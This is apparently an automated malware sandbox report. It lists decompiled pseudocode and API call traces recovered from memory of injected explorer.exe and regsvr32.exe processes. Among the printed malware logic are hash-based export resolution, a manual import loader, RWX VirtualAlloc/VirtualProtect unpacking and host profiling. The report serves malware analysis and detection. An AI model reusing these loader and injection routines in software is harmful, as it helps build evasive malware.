        						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
        						_t41 =  *0xde6dc; // 0x1d8
        						__eflags = 0;
        						_t13 = E000CA4BF(_t41, 0);
        						continue;
        					}
        					__eflags = _t41 - _v28;
        					if(_t41 >= _v28) {
        						goto L9;
        					}
        					goto L4;
        				}
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				_t20 =  *0xde6e8; // 0x64ffd0
        				_v28 = _t20;
        				_t22 = E000CA6A9(_t41, _t61,  &_v16);
        				_v20 = _t22;
        				if(_t22 != 0) {
        					_t23 = GetCurrentProcess();
        					_t24 = GetCurrentThread();
        					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0xde6d0, 0, 0, 2);
        					E000C980C(0xde6e0);
        					_t64 = E000C1A1B( &_v28, E000C1226, _t71);
        					__eflags = _t64;
        					if(_t64 >= 0) {
        						_push(0);
        						_push( *0xde760);
        						_t51 = 0x27;
        						E000C9F06(_t51);
        					}
        				} else {
        					_t64 = _t61 | 0xffffffff;
        				}
        				_t29 =  *0xde684; // 0x64f8f0
        				 *((intOrPtr*)(_t29 + 0x30))( *0xde6d0);
        				_t48 =  *0xde6dc; // 0x1d8
        				 *0xde6d0 = 0;
        				E000CA4DB(_t48);
        				E000C861A( &_v24, 0);
        				_t16 = _t64;
        				goto L13;
        			}

        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 4c8d8e5c4664eac2527a7276f7899c789ab0069d66b9e98cb1343daa34874c73
        • Instruction ID: f2db016a6e86ac95650e658f1212804d8919bf6c937486c21d9280327b646b79
        • Opcode Fuzzy Hash: 4c8d8e5c4664eac2527a7276f7899c789ab0069d66b9e98cb1343daa34874c73
        • Instruction Fuzzy Hash: E731C732605244AFE354EF64EC85EAE77A9EB55390B10092FF901CB2E3DE38DC048766
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E000C1B2D(void* __eflags, void* __fp0) {
        				char _v24;
        				char _v28;
        				void* _t12;
        				intOrPtr _t14;
        				void* _t15;
        				intOrPtr _t16;
        				void* _t17;
        				void* _t19;
        				void* _t20;
        				char _t24;
        				intOrPtr _t26;
        				intOrPtr _t28;
        				intOrPtr _t33;
        				intOrPtr _t38;
        				intOrPtr _t40;
        				void* _t41;
        				intOrPtr _t46;
        				void* _t48;
        				intOrPtr _t51;
        				void* _t61;
        				void* _t71;
        
        				_t71 = __fp0;
        				_t38 =  *0xde6f4; // 0x1d4
        				_t12 = E000CA4BF(_t38, 0);
        				while(_t12 < 0) {
        					E000C980C( &_v28);
        					_t40 =  *0xde700; // 0x0
        					_t14 =  *0xde704; // 0x0
        					_t41 = _t40 + 0x3840;
        					asm("adc eax, ebx");
        					__eflags = _t14 - _v24;
        					if(__eflags > 0) {
        						L13:
        						_t15 = 0;
        					} else {
        						if(__eflags < 0) {
        							L4:
        							_t16 =  *0xde684; // 0x64f8f0
        							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0xde6ec, 0);
        							__eflags = _t17;
        							if(_t17 == 0) {
        								break;
        							} else {
        								_t33 =  *0xde684; // 0x64f8f0
        								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
        								_t51 =  *0xde6f4; // 0x1d4
        								__eflags = 0;
        								_t12 = E000CA4BF(_t51, 0);
        								continue;
        							}
        						} else {
        							__eflags = _t41 - _v28;
        							if(_t41 >= _v28) {
        								goto L13;
        							} else {
        								goto L4;
        							}
        						}
        					}
        					L12:
        					return _t15;
        				}
        				E000C980C(0xde700);
        				_t19 = GetCurrentProcess();
        				_t20 = GetCurrentThread();
        				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0xde6ec, 0, 0, 2);
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				_t24 =  *0xde6e8; // 0x64ffd0
        				_v28 = _t24;
        				_t61 = E000C1A1B( &_v28, E000C131E, _t71);
        				if(_t61 >= 0) {
        					_push(0);
        					_push( *0xde760);
        					_t48 = 0x27;
        					E000C9F06(_t48);
        				}
        				if(_v24 != 0) {
        					E000C6890( &_v24);
        				}
        				_t26 =  *0xde684; // 0x64f8f0
        				 *((intOrPtr*)(_t26 + 0x30))( *0xde6ec);
        				_t28 =  *0xde758; // 0x0
        				 *0xde6ec = 0;
        				_t29 =  !=  ? 1 : _t28;
        				_t46 =  *0xde6f4; // 0x1d4
        				 *0xde758 =  !=  ? 1 : _t28;
        				E000CA4DB(_t46);
        				_t15 = _t61;
        				goto L12;
        			}

        APIs
        • GetCurrentProcess.KERNEL32(000DE6EC,00000000,00000000,00000002), ref: 000C1BCC
        • GetCurrentThread.KERNEL32(00000000), ref: 000C1BCF
        • GetCurrentProcess.KERNEL32(00000000), ref: 000C1BD6
        • DuplicateHandle.KERNEL32 ref: 000C1BD9
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Current$Process$DuplicateHandleThread
        • String ID:
        • API String ID: 3566409357-0
        • Opcode ID: 7432552202618214ff09496dd892babb79cb5ed6e1a56431ae5e527e25d11dc9
        • Instruction ID: 2b5b3560eca2b9c66e54fa8514e9480b8e1ea27dea2e81419eb01e222fcba38a
        • Opcode Fuzzy Hash: 7432552202618214ff09496dd892babb79cb5ed6e1a56431ae5e527e25d11dc9
        • Instruction Fuzzy Hash: C831A6716053419FE744FF64EC89EAE77A4EB55390B00456EF9018B2A3DA38DC04CB72
        Uniqueness

        Uniqueness Score: -1.00%

        Execution Graph

        Execution Coverage:2%
        Dynamic/Decrypted Code Coverage:100%
        Signature Coverage:0%
        Total number of Nodes:41
        Total number of Limit Nodes:2


        Executed Functions

        Control-flow Graph

        APIs
        • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
        • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
        • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
        • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
        • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
        Memory Dump Source
        • Source File: 00000009.00000002.574694043.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_9_2_10077000_regsvr32.jbxd
        Similarity
        • API ID: Virtual$Protect$Alloc$Free
        • String ID:
        • API String ID: 2574235972-0
        • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
        • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        APIs
        • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
        • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
        Memory Dump Source
        • Source File: 00000009.00000002.574663098.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_9_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: DirectoryProtectSystemVirtual
        • String ID:
        • API String ID: 648172718-0
        • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
        • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Control-flow Graph

        APIs
        • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
        • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
        Strings
        Memory Dump Source
        • Source File: 00000009.00000002.574663098.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_9_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: ChangeDirectoryFindFirstNotificationWindows
        • String ID: 1
        • API String ID: 3662519435-2212294583
        • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
        • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
        Uniqueness

        Uniqueness Score: -1.00%

        Executed Functions

        Control-flow Graph

        APIs
        • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
        • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
        • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
        • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
        • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
        Memory Dump Source
        • Source File: 0000000C.00000002.582234243.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_12_2_10077000_regsvr32.jbxd
        Similarity
        • API ID: Virtual$Protect$Alloc$Free
        • String ID:
        • API String ID: 2574235972-0
        • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
        • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        APIs
        • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
        • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
        Memory Dump Source
        • Source File: 0000000C.00000002.582065156.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_12_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: DirectoryProtectSystemVirtual
        • String ID:
        • API String ID: 648172718-0
        • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
        • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Control-flow Graph

        APIs
        • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
        • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
        Strings
        Memory Dump Source
        • Source File: 0000000C.00000002.582065156.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_12_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: ChangeDirectoryFindFirstNotificationWindows
        • String ID: 1
        • API String ID: 3662519435-2212294583
        • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
        • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
        Uniqueness

        Uniqueness Score: -1.00%

        Executed Functions

        Control-flow Graph

        C-Code - Quality: 94%
        			E000CCF84(void* __ecx) {
        				intOrPtr _t11;
        				long _t12;
        				intOrPtr _t17;
        				intOrPtr _t18;
        				struct _OSVERSIONINFOA* _t29;
        
        				_push(__ecx);
        				_t29 =  *0xde688; // 0xf0000
        				GetCurrentProcess();
        				_t11 = E000CBA05(); // executed
        				_t1 = _t29 + 0x1644; // 0xf1644
        				_t25 = _t1;
        				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
        				_t12 = GetModuleFileNameW(0, _t1, 0x105);
        				_t33 = _t12;
        				if(_t12 != 0) {
        					_t12 = E000C8FBE(_t25, _t33);
        				}
        				_t3 = _t29 + 0x228; // 0xf0228
        				 *(_t29 + 0x1854) = _t12;
        				 *((intOrPtr*)(_t29 + 0x434)) = E000C8FBE(_t3, _t33);
        				memset(_t29, 0, 0x9c);
        				_t29->dwOSVersionInfoSize = 0x9c;
        				GetVersionExA(_t29);
        				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
        				_t17 = E000CE3B6(_t3);
        				_t7 = _t29 + 0x220; // 0xf0220
        				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
        				_t18 = E000CE3F1(_t7); // executed
        				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
        				return _t18;
        			}

        APIs
        • GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
        • GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
        • memset.MSVCRT ref: 000CCFE2
        • GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
        • GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CurrentProcess$FileModuleNameVersionmemset
        • String ID:
        • API String ID: 3581039275-0
        • Opcode ID: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
        • Instruction ID: 85beb0dd8ed8ae9ed765903e2ec244192ab05f814248cde92d819e8ab3455d73
        • Opcode Fuzzy Hash: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
        • Instruction Fuzzy Hash: B6019E709027009BE720AF71D84AFEABBE5EF80300F00082EF85683282EF746505CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 50%
        			E000D249B(signed int __eax, intOrPtr _a4) {
        				intOrPtr* _v8;
        				signed int* _v12;
        				signed int _v16;
        				signed int _v20;
        				signed int _v24;
        				signed int _v28;
        				intOrPtr _v32;
        				struct HINSTANCE__* _v36;
        				intOrPtr _v40;
        				signed int _v44;
        				struct HINSTANCE__* _v48;
        				intOrPtr _v52;
        				signed int _v56;
        				intOrPtr _v60;
        				signed int _v64;
        				signed int _t109;
        				signed int _t112;
        				signed int _t115;
        				struct HINSTANCE__* _t121;
        				void* _t163;
        
        				_v44 = _v44 & 0x00000000;
        				if(_a4 != 0) {
        					_v48 = GetModuleHandleA("kernel32.dll");
        					_v40 = E000CE099(_v48, "GetProcAddress");
        					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
        					_v32 = _v52;
        					_t109 = 8;
        					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
        						L24:
        						return 0;
        					}
        					_v56 = 0x80000000;
        					_t112 = 8;
        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
        						_v8 = _v8 + 0x14;
        					}
        					_t115 = 8;
        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
        						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
        						_v36 = _t121;
        						if(_v36 != 0) {
        							if( *_v8 == 0) {
        								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
        							} else {
        								_v12 =  *_v8 + _a4;
        							}
        							_v28 = _v28 & 0x00000000;
        							while( *_v12 != 0) {
        								_v24 = _v24 & 0x00000000;
        								_v16 = _v16 & 0x00000000;
        								_v64 = _v64 & 0x00000000;
        								_v20 = _v20 & 0x00000000;
        								if(( *_v12 & _v56) == 0) {
        									_v60 =  *_v12 + _a4;
        									_v20 = _v60 + 2;
        									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
        									_v16 = _v40(_v36, _v20);
        								} else {
        									_v24 =  *_v12;
        									_v20 = _v24 & 0x0000ffff;
        									_v16 = _v40(_v36, _v20);
        								}
        								if(_v24 != _v16) {
        									_v44 = _v44 + 1;
        									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
        										 *_v12 = _v16;
        									} else {
        										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
        									}
        								}
        								_v12 =  &(_v12[1]);
        								_v28 = _v28 + 4;
        							}
        							_v8 = _v8 + 0x14;
        							continue;
        						}
        						_t163 = 0xfffffffd;
        						return _t163;
        					}
        					goto L24;
        				}
        				return __eax | 0xffffffff;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000D24B8
        • LoadLibraryA.KERNEL32(00000000), ref: 000D2551
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID: GetProcAddress$kernel32.dll
        • API String ID: 4133054770-1584408056
        • Opcode ID: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
        • Instruction ID: deaac39a8f92dcb34ee975fe36824c3fd640916c06a8e948343ef26f76a1822f
        • Opcode Fuzzy Hash: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
        • Instruction Fuzzy Hash: BB619C75900209EFDB50CF98D885BADBBF1FF08315F24859AE815AB391C774AA80DF60
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 80%
        			E000C61B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
        				void* _v8;
        				int _v12;
        				int _v16;
        				int _v20;
        				char _v24;
        				char _v28;
        				void* _v32;
        				void* _v36;
        				char _v40;
        				char _v44;
        				char _v48;
        				char _v56;
        				void _v576;
        				intOrPtr _t63;
        				intOrPtr _t72;
        				intOrPtr _t80;
        				intOrPtr _t81;
        				intOrPtr _t82;
        				signed int _t85;
        				intOrPtr _t87;
        				int _t89;
        				intOrPtr _t90;
        				intOrPtr _t92;
        				void* _t96;
        				void* _t97;
        				void* _t98;
        				void* _t99;
        				void* _t100;
        				void* _t108;
        
        				_t108 = __fp0;
        				_t96 = __edx;
        				_t89 = 0;
        				_v8 = 0;
        				memset( &_v576, 0, 0x208);
        				_v28 = 0x104;
        				_v20 = 0x3fff;
        				_v16 = 0;
        				_t98 = E000C8604(0x3fff);
        				_t100 = _t99 + 0x10;
        				_v32 = _t98;
        				if(_t98 == 0) {
        					L18:
        					return 0;
        				}
        				_t97 = E000C8604(0x800);
        				_v36 = _t97;
        				if(_t97 == 0) {
        					goto L18;
        				}
        				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
        					L15:
        					if(_v8 != 0) {
        						_t63 =  *0xde68c; // 0x280fab8
        						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
        					}
        					E000C861A( &_v32, 0x3fff);
        					E000C861A( &_v36, 0x800);
        					goto L18;
        				}
        				_push( &_v56);
        				_push( &_v40);
        				_push( &_v44);
        				_push( &_v48);
        				_push( &_v24);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push( &_v28);
        				_push( &_v576);
        				_t72 =  *0xde68c; // 0x280fab8
        				_push(_v8);
        				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
        					__eflags = _v24;
        					if(_v24 == 0) {
        						goto L15;
        					}
        					_v12 = 0;
        					do {
        						memset(_t97, 0, 0x800);
        						memset(_t98, 0, 0x3fff);
        						_t100 = _t100 + 0x18;
        						_v20 = 0x3fff;
        						_v16 = 0x800;
        						 *_t98 = 0;
        						_t80 =  *0xde68c; // 0x280fab8
        						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
        						__eflags = _t81;
        						if(_t81 == 0) {
        							_t82 =  *0xde690; // 0x280fb90
        							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
        							__eflags = _t90;
        							if(_t90 != 0) {
        								_t92 =  *0xde68c; // 0x280fab8
        								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
        								__eflags = _a16;
        								if(_a16 != 0) {
        									_t85 = E000CC392(_t90);
        									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
        									if(__eflags == 0) {
        										__eflags = 0;
        										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
        									}
        									E000CB1B1(_t90, _t96, __eflags, _t108);
        								}
        							}
        							_t89 = _v12;
        						}
        						_t89 = _t89 + 1;
        						_v12 = _t89;
        						__eflags = _t89 - _v24;
        					} while (_t89 < _v24);
        					goto L15;
        				}
        				_t87 =  *0xde68c; // 0x280fab8
        				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
        				goto L15;
        			}

        APIs
        • memset.MSVCRT ref: 000C61D2
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 000C622C
        • memset.MSVCRT ref: 000C6295
        • memset.MSVCRT ref: 000C62A2
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: memset$AllocateHeapOpen
        • String ID:
        • API String ID: 2508404634-0
        • Opcode ID: 3d8d8dafa7df1e62804fdd5e4aa686f8d042dc27e0b2e973a6a4529a7a4394ff
        • Instruction ID: f078e681015c4581afc2321a8b200155c778797c9d6990bad354d136111ed3bb
        • Opcode Fuzzy Hash: 3d8d8dafa7df1e62804fdd5e4aa686f8d042dc27e0b2e973a6a4529a7a4394ff
        • Instruction Fuzzy Hash: 33510EB1A00249AFEB61DF94CC85FEE7BBCEF04740F10806AF605AB152DB759A058B65
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 100%
        			E000CDFAD(void* __ecx, intOrPtr __edx) {
        				signed int _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v92;
        				intOrPtr _t41;
        				signed int _t47;
        				signed int _t49;
        				signed int _t51;
        				void* _t56;
        				struct HINSTANCE__* _t58;
        				_Unknown_base(*)()* _t59;
        				intOrPtr _t60;
        				void* _t62;
        				intOrPtr _t63;
        				void* _t69;
        				char _t70;
        				void* _t75;
        				CHAR* _t80;
        				void* _t82;
        
        				_t75 = __ecx;
        				_v12 = __edx;
        				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
        				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
        				if(_t41 == 0) {
        					L4:
        					return 0;
        				}
        				_t62 = _t41 + __ecx;
        				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
        				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
        				_t63 =  *((intOrPtr*)(_t62 + 0x18));
        				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
        				_t47 = 0;
        				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
        				_v8 = 0;
        				_v16 = _t63;
        				if(_t63 == 0) {
        					goto L4;
        				} else {
        					goto L2;
        				}
        				while(1) {
        					L2:
        					_t49 = E000CD400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E000CC379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
        					_t51 = _v8;
        					if((_t49 ^ 0x218fe95b) == _v12) {
        						break;
        					}
        					_t73 = _v20;
        					_t47 = _t51 + 1;
        					_v8 = _t47;
        					if(_t47 < _v16) {
        						continue;
        					}
        					goto L4;
        				}
        				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
        				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
        				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
        					return _t80;
        				} else {
        					_t56 = 0;
        					while(1) {
        						_t70 = _t80[_t56];
        						if(_t70 == 0x2e || _t70 == 0) {
        							break;
        						}
        						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
        						_t56 = _t56 + 1;
        						if(_t56 < 0x40) {
        							continue;
        						}
        						break;
        					}
        					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
        					 *((char*)(_t82 + _t56 - 0x54)) = 0;
        					if( *((char*)(_t56 + _t80)) != 0) {
        						_t80 =  &(( &(_t80[1]))[_t56]);
        					}
        					_t40 =  &_v92; // 0x6c6c642e
        					_t58 = LoadLibraryA(_t40); // executed
        					if(_t58 == 0) {
        						goto L4;
        					}
        					_t59 = GetProcAddress(_t58, _t80);
        					if(_t59 == 0) {
        						goto L4;
        					}
        					return _t59;
        				}
        			}

        APIs
        • LoadLibraryA.KERNEL32(.dll), ref: 000CE07D
        • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 000CE089
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: .dll
        • API String ID: 2574300362-2738580789
        • Opcode ID: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
        • Instruction ID: 5f9d211447d3819fd503f87bdcf7e534d45c92374d2040a9589af20f045a33b0
        • Opcode Fuzzy Hash: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
        • Instruction Fuzzy Hash: 6D31B231A001959BDB64CFA9C884BAEBBE5AF44304F38446ED905D7352DA74ED81CBE0
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 99 cb998-cb9b8 GetTokenInformation 100 cb9fe 99->100 101 cb9ba-cb9c3 GetLastError 99->101 103 cba00-cba04 100->103 101->100 102 cb9c5-cb9d5 call c8604 101->102 106 cb9db-cb9ee GetTokenInformation 102->106 107 cb9d7-cb9d9 102->107 106->100 108 cb9f0-cb9fc call c861a 106->108 107->103 108->107
        C-Code - Quality: 86%
        			E000CB998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
        				long _v8;
        				void* _v12;
        				void* _t12;
        				void* _t20;
        				void* _t22;
        				union _TOKEN_INFORMATION_CLASS _t28;
        				void* _t31;
        
        				_push(_t22);
        				_push(_t22);
        				_t31 = 0;
        				_t28 = __edx;
        				_t20 = _t22;
        				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
        					L6:
        					_t12 = _t31;
        				} else {
        					_t31 = E000C8604(_v8);
        					_v12 = _t31;
        					if(_t31 != 0) {
        						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
        							goto L6;
